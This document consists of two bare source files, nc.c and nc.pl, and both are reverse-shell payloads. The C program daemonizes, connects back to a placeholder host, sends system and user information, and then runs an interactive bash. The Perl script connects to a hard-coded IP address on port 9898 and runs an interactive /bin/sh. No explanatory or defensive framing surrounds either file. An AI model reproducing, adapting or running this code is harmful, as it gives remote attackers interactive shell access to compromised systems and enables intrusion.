File: nc.c
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>

int main(void) {
	daemon(1, 0);
	int sock = socket(AF_INET, SOCK_STREAM, 0);
	struct sockaddr_in serv_addr = {0};
	serv_addr.sin_family = AF_INET;
	serv_addr.sin_port = htons(1234);
	serv_addr.sin_addr.s_addr = inet_addr("x.x.x.x");
	if(0 != connect(sock, (struct sockaddr *)&serv_addr, sizeof(serv_addr)))
		_exit(0);
	dup2(sock, 0);
	dup2(sock, 1);
	dup2(sock, 2);
	system("uname -a; w; id");
	execl("/bin/bash", "/bin/bash", "-i", NULL);
}

File: nc.pl
use Socket; 
$i="110.138.130.152"; 
$p=9898; 
socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp")); 
if(connect(S,sockaddr_in($p,inet_aton($i)))){ 
	open(STDIN,">&S"); 
	open(STDOUT,">&S"); 
	open(STDERR,">&S"); 
	exec("/bin/sh -i"); 
};
